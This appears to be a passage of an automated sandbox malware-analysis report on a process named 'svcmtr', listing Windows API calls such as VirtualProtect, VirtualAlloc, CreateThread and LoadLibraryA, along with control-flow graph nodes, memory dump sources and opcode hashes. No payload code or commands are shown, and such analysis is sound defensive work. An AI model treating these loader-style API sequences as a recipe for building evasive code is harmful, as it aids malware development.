                                                                                                                            • String ID: XgC
                                                                                                                            • API String ID: 3996875869-1485261648
                                                                                                                            • Opcode ID: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
                                                                                                                            • Instruction ID: 0c0e6288bb74e38c03d3acc2e6d49cf587f7ffeb63a82042cf818f3927628381
                                                                                                                            • Opcode Fuzzy Hash: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
                                                                                                                            • Instruction Fuzzy Hash: 0DD012326002086BDB009B59E84AA4D37D8DB44238B948405F44DC7652DB79E8554A5C

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:317
                                                                                                                            Total number of Limit Nodes:4
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 32211ed43804c9c2024fb423d83f40c87190245b08f71caeb1ba956bcd53cb85
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: E0916CF2E34729CFEB19CA64CC917BDB272FBC1300F19966AC107AB145DAF459658E40
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d34ac70a124d5ab01515cd46ee62588fb34addd97495f0f1b6d5c9fc03f0b873
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 8661E9B2E34728CFDB19CE64CC817ADF772BF85304F1586AAC006AB254DBB059659F81

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457
                                                                                                                            • Opcode ID: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction ID: 776a5c64f1a306dd56843be8127c0eba6ea4a7ea08eb195fb411112e3a0670e1
                                                                                                                            • Opcode Fuzzy Hash: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction Fuzzy Hash: 7591ACF6A30622DAFF1C5670CC66BBC2516E7E0700F28E52DA203D9593DEFD48759910

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 103 23137c-23148f call 230af8 * 2 call 230c47 VirtualProtect 116 231491-2314a4 103->116 117 2314a9-2314f1 103->117 116->117 120 2314f7-231559 117->120 124 23155b-231561 120->124
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 169 2313bb-2313ef call 230c47 VirtualProtect 175 2313f4-23148f 169->175 177 231491-2314a4 175->177 178 2314a9-2314f1 175->178 177->178 181 2314f7-231559 178->181 185 23155b-231561 181->185
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 186 231639-2316aa call 230c47 VirtualProtect 196 2316ad-231724 call 230eb7 call 23172b 186->196 205 231726-231792 call 230af8 * 2 call 230c47 196->205 206 231795-231796 196->206 208 231797-23179e VirtualProtect 205->208 206->208 209 2317a3-2317d0 208->209 209->196 219 2317d6-2317e4 209->219
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 314 231efa-231f3b call 230c47 322 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 314->322 323 231f41-231f49 314->323 361 232113 322->361 362 2320ae-2320af 322->362 323->322 325 231f4f-231f5f call 231f6a 323->325 333 231f61 325->333 334 231fca-231fd1 325->334 336 231fb3-231fc9 call 230c47 333->336 337 231f63 333->337 346 231fd6-231fe2 334->346 336->334 338 231f65-231fb2 call 230af8 * 2 337->338 339 231fd4-231fd5 337->339 338->336 339->346 346->322 364 232116-232119 361->364 363 2320b1-232119 call 230af8 * 2 call 230c47 362->363 362->364 366 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 363->366 364->366
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 398 231f25-231f3b 402 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 398->402 403 231f41-231f49 398->403 441 232113 402->441 442 2320ae-2320af 402->442 403->402 405 231f4f-231f5f call 231f6a 403->405 413 231f61 405->413 414 231fca-231fd1 405->414 416 231fb3-231fc9 call 230c47 413->416 417 231f63 413->417 426 231fd6-231fe2 414->426 416->414 418 231f65-231fb2 call 230af8 * 2 417->418 419 231fd4-231fd5 417->419 418->416 419->426 426->402 444 232116-232119 441->444 443 2320b1-232119 call 230af8 * 2 call 230c47 442->443 442->444 446 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 443->446 444->446
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 478 231013-23109c call 230af8 * 2 call 230c47 LoadLibraryA 491 23109e-2310ab 478->491 492 2310ad-2310b8 478->492 494 2310ba-2310f7 491->494 492->494 499 23124e-231264 494->499 500 2310fd-231107 494->500 508 231266-231279 499->508 509 231299-2312a8 499->509 501 231127-231142 500->501 502 231109-231125 500->502 511 231147-231163 call 23116e 501->511 502->511 512 23127b-23127e 508->512 519 231165-2311d3 call 230af8 * 2 call 230c47 511->519 520 2311d4-2311f8 511->520 513 231280-231293 512->513 514 231295-231297 512->514 513->512 514->509 519->520 528 2311fa-231206 520->528 529 23123e-231249 520->529 532 231236-23123b 528->532 533 231208-231216 528->533 532->529 535 231218-23121b 533->535 537 23122d-231231 535->537 538 23121d-23122b 535->538 537->532 538->535
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 543 231f30-231f3b 544 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 543->544 545 231f41-231f49 543->545 583 232113 544->583 584 2320ae-2320af 544->584 545->544 547 231f4f-231f5f call 231f6a 545->547 555 231f61 547->555 556 231fca-231fd1 547->556 558 231fb3-231fc9 call 230c47 555->558 559 231f63 555->559 568 231fd6-231fe2 556->568 558->556 560 231f65-231fb2 call 230af8 * 2 559->560 561 231fd4-231fd5 559->561 560->558 561->568 568->544 586 232116-232119 583->586 585 2320b1-232119 call 230af8 * 2 call 230c47 584->585 584->586 588 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 585->588 586->588
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:307
                                                                                                                            Total number of Limit Nodes:5
5736 2b2124 CreateThread 5738 2b2130 5736->5738 5737->5736 5739 2b216c RtlExitUserThread 5738->5739 5740 2b215a 5739->5740 5741 2b21d8 RtlExitUserThread 5740->5741 5742 2b21e4 5741->5742 5546 2b21d6 5547 2b21d8 RtlExitUserThread 5546->5547 5548 2b21e4 5547->5548 5765 2b0856 5766 2b0858 5765->5766 5767 2b08bd 2 API calls 5766->5767 5768 2b089c 5767->5768 5769 2b0755 5770 2b0770 5769->5770 5771 2b07d9 2 API calls 5770->5771 5773 2b0a2b 5770->5773 5775 2b07ce 5770->5775 5771->5775 5772 2b08bd 2 API calls 5774 2b089c 5772->5774 5775->5772
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 002B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                              • Part of subcall function 002B1DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 0c15396a1fd1c5a67efc47271c8e6daa0213b4916830b4af3b4b0b8853b47323
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: EE916C72E34725CBEB19CA68CCA1BFDB672FBC0340F59866AC107EB145DAB459648E40
                                                                                                                            APIs
